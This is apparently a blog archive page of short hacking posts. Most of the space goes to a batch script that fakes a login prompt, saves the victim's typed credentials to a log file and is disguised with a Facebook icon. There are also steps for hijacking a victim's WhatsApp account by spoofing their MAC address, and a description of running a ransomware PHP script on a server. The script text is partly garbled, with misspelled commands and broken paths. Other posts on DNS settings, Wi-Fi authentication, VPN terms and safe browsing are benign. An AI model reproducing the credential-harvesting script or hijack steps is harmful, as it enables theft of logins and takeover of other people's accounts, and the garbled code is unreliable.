Posts

Showing posts from December, 2019

Batch Script for Hacking Facebook

Open Notepad, Copy and paste the content below in the Notepad. @echo off colour a title login echo Please Enter Email Jddress and Password echo. echo. cd.c:\logs" set/p user=username set/p pass=password echo username="%user%" password="%pass%">logs.txt start www&facebook&com exit Note:while copying 12th line change the& to . >save as (anything).bat >click on c drive and create folder named logs >now create shortcut file on the bat >right click on the shortcut and click properties and change the icon to a facebook icon All the things are configured. Now test it. Happy Hacking :)

Hack for Fast browsing of Internet by changing DNS settings

In this Blog we'll discuss about free OpenDNS services that are one of the most popular free DNS services that were started to provide an alternative method to those who were discontented with their existing DNS services. Just follow the below steps to do so. Step 1:   Go To Control Panel ---> Network and Internet options. Step 2: Now you need to click on “Change Adapter settings” Step 3: Click on your internet connection that you have currently connected and open properties of that network. Step 4: Now click on the Internet Protocol Version 4 (TCP/IPv4) and click on Properties. Now choose the following DNS server addresses to get a faster internet speed . Preferred DNS server: 208.67.222.222 Alternate DNS server: 208.67.220.220 . Step 5: Now click on OK and now configure Ipv6 Preferred DNS server: 2620:0:ccc::2 Alternate DNS server: 2620:0:ccd::2 Save all the settings, and now you are using a DNS with fast internet browsing. That’s  it! You a...

Wireless Networks Guide

Wireless Network A wireless network is a network that uses radio waves to link computers and other devices together. The implementation is done at the Layer 1 (physical layer) of the OSI model. How to access a wireless network? You will need a wireless network enabled device such as a laptop, tablet, smartphones, etc. You will also need to be within the transmission radius of a wireless network access point. Most devices (if the wireless network option is turned on) will provide you with a list of available networks. If the network is not password protected, then you just have to click on connect. If it is password protected, then you will need the password to gain access. Wireless Network Authentication Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques. WEP WEP is the acronym for Wired Equivalent Privacy. It was devel...

HOW TO HACK WHATSAPP ACCOUNT BY SPOOFING MAC ADDRESS

Why we Spoof our MAC (Media Access Control)address with our victim's mac address??? This command will change your MAC Address with your victim MAC address. Whatsapp won't allow its users to use same account on two different Devices. if you do this without spoofing mac address whatsapp system will delete your first account. So we need spoof our MAC address with our victim address. Step 1: First of all we find the Mac Address of our victim phone.if you you want to hack your friend whatsapp then you can simply ask him about his device mac Address . now  Question is where Mac Address is located ?? Open your victim phone's Menu ----->About phone ---->Status Now scroll down where you see a 12-digits code under WiFi Mac Address like this: E5:16:D8:E6:69:96 copy it... Step 2: Now we Spoof our MAC Address with Victim's phone MAC Address. so how to do it?? Requirements: Rooted android phone. Busy-box app . Terminal app. install these app from y...

Internet Throttling

Internet Throttling What is Throttling? Throttling is the term used when the Internet Service Provider (ISP) limits your bandwidth after you've reached a preset monthly data limit, but it can also occur when an ISP decides to slow certain online destinations.  It is also referred as  Bandwidth Throttling.  It is the intentional speeding up or slowing down of an Internet service. it is a reactive measure employed for regulating the network traffic and minimizing the bandwidth congestion. Is Internet Throttling is Illegal? Cell phone providers can legally throttle customers Internet speeds to reduce congestion during peak hours or in densely populated cities; however, the Federal Trade Commission (FTC) has said that throttling may become illegal if companies limit their customers Internet speeds in a “deceptive or unfair” fashion. The following wireless providers have been accused of data throttling: ...

Understanding VPN's, conforming 10 terms before choosing one

VPN stands for Virtual Private Network.  A VPN is a way of connecting to the internet in a more secure or private way, by sending your data through an encrypted tunnel and hiding your true IP address, making it harder for someone to track your online activity.  when deciding on a new VPN service, keep in mind the following terms which will help you to navigate the field and understand what a provider offers: 1. Encryption: Provider uses an algorithm to securely encode data (using a secret key) so that it appears like random, digitally illegible information. Once the encrypted data reaches its destination, a key is used to decrypt it. There are multiple types of encryption used by VPNs, which varies in strength. Advanced Encryption Standard(AES)-256 (usually called as "military-grade encryption") is the industry standard. If a website address begins with HTTPS, rather than HTTP then it is using AES.  2. Five Eyes: The name of mass surveillance and intelligence-...

Understanding Ransomeware with a PHP script

Image
RANSOMWARE Introduction: Ransomware is a type of malware that encrypts a victim’s files. The attacker then demands a ransom from the victim to restore access to the data upon payment. While ransomware has technically been around since the 90’s, its only in the past five years or so that it has really taken off, largely because of the availability of untraceable payment methods like Bitcoins. Here I’ve created a PHP file that will encrypt all the files and directories from the server’s root directory and only inside the server’s web root directory. It is purely made for educational purpose to make technocrats understand how the ransomware actually works. It is tested on the following: Operating System: Windows 10 Pro (64-bit) Web Server: XAMPP v7.3.7(64-bit) HOW TO EXECUTE: Note: Backup your server files before executing the ransomware. Care not to lose your Data!!! Copy encrypt.php to the Server’s web root directory (xampp/htdocs). Open your preferred browse...

Tips for Safely browsing Internet

Internet is all about Pool of Information The Internet is the global storehouse for information. It is like having the biggest library in the World at your fingertip Use the net to increase your knowledge, to do class work better Visit interesting places sitting at your computer. Use the net to keep in touch with children from other parts of the Country or other Countries-make new pen friends; collect information. Many on-line service providers host chat rooms especially for children, monitored continuously for safety. The net is a global community - without any barriers, distances, boundaries. Be careful about talking to "strangers" on a computer network. Respect privacy on the net. You may have known the password of some other user- your friend/schoolmate. But do not use it to read their mail or send mail from their ID. Remember somebody else can also do this to you. Use the net to find information about schools and colleges-events or courses they may be offering....